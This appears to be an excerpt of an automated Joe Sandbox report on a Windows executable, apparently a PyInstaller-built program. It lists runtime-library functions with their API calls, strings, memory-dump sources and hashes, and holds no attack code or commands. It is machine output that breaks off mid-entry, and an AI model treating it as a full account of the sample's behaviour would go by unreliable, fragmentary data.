                                                                                                                                                                                                                                      • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                      • Instruction ID: fe99d0e221ee02b96bc3db454a5df5a87a99ed05ba96d71ca1fe15687e6c4f9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22217F73A1878682F620EB51F8417E6A394EF88384F800175EA8C43759DF7CE5458750
                                                                                                                                                                                                                                      Function 00007FF70AF09AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                      • Instruction ID: 7365c7fd6484a1f6575abeb10856d5e041908d40f751d4fdb38c89511f200e69
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0C263B0870681FB10AB24EC857799320EF49761FC406B5CA6E462E4DF2CF244C320
                                                                                                                                                                                                                                      Function 00007FF70AF193D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                      • Instruction ID: b7f261f52d7e68346e2de06795a83c56d642d4e0f3b57b87f360d0d87c195c49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9114F63F5CA1301F6747124ECF6375A0447F59364E888AB4EA7E067DA8FACF94141E4
                                                                                                                                                                                                                                      Function 00007FF70AF0B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B41F
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B43E
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B466
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B477
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B488
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                      • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                      • Instruction ID: 512bef3470ef55ed39361f446a20dadbf207a56bc99f2d89b64f5fdfa67b4598
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E117C26F0C60281FA68BB21DE51979E1465F847B0FD883B4E83D866D6DF2CF9018320
                                                                                                                                                                                                                                      Function 00007FF70AF0B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                      • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                      • Instruction ID: f7b4deea675e9d3c9158ca95c3f3f47830450184663674ee65b1bf29633fa205
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2611F722E0920785FA6DB265DD52A7EA2424F45770FE847B4D93ECA2D2DF2CF8418331
                                                                                                                                                                                                                                      Function 00007FF70AF06010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                      • Instruction ID: 9b1bf69a63ec95d0ff0f5473cc336e868e018205b7781936fe91eb34afd42c60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0491BE23A08A4685FBA1AE24DC50B7DB391AF54B94FC44176DA59C73C5DFBCF4258320
                                                                                                                                                                                                                                      Function 00007FF70AF0FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                      • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                      • Instruction ID: cea054204bd09a42d1124978da5fb9ceb2354dab9776b7826d6975f41b508175
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B81CD33E0924386F7747E29CD00A78F6A0AF11B48FE580B5DA09C729ADB2DF945D721
                                                                                                                                                                                                                                      Function 00007FF70AEFD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                      • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                      • Instruction ID: 9cda086528c869ed6ed959db85c1e3fecad0506b03ebad8ad21036e0761a4546
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93519F33A196828AFB14BF15EC85A78AB95EF44B98FD04170DA4E47788EF7DE841C710
                                                                                                                                                                                                                                      Function 00007FF70AEFF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                      • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                      • Instruction ID: 6b5274bffe11efc9ecf9d73041aa658e4989a9e7094bf35be6789e5bed2345b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96518E33A0828386FB64BE21D945268B6A0EF54B94FD482B5DA5D47795CF3CE850C711
                                                                                                                                                                                                                                      Function 00007FF70AEFEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                      • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                      • Instruction ID: cf20e3d6605833d33034983cc209f0c6c4d6080a276a98b9289822e08fb3ab30
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F619133908BC685EB60AB15E8413AAF7A0FF85B94F844265EB9C17B55DF7CE190CB10
                                                                                                                                                                                                                                      Function 00007FF70AEF7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF70AEF352C,?,00000000,00007FF70AEF3F23), ref: 00007FF70AEF7F22
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                      • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                      • Instruction ID: e6d8ffa678aefedd6ecf55b23c6f8e9544d91364f54e3045387ec137362d1bcc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C931D223619AC645FA21BB20EC517EAA354EF84BE4FC44271EA6D437C9DF3CE6458710
                                                                                                                                                                                                                                      Function 00007FF70AEF2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                      • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                      • Instruction ID: 577300b563743897b293d8ec270cd96a1726ddefebb4172232cfd68420051a18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8217F63B08B4192F620EB54F8457EAB3A4EF88784F804136EA8D97755DF3CE649C750
                                                                                                                                                                                                                                      Function 00007FF70AF0C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                                                      • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                      • Instruction ID: e3439b7ebad138d05f08ed68bc43589925fa6b3bb7cfb0cd78a6bec946f5cce5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CD1F073B08A818AFB10DF65D8406ACB7A1EB44798F808275DE5E97B99DF38E016C350
                                                                                                                                                                                                                                      Function 00007FF70AF0F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                                                      • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                      • Instruction ID: 2ecdab026bf0ae0ec72edd5e9961e9064bbd2af6c9b963bdcd6094df18156d10
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0351D673F081128AFB24EF24DD55ABCA7A1AF40358F914175DE1E92AE5DB3CF4428710
                                                                                                                                                                                                                                      Function 00007FF70AF057EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
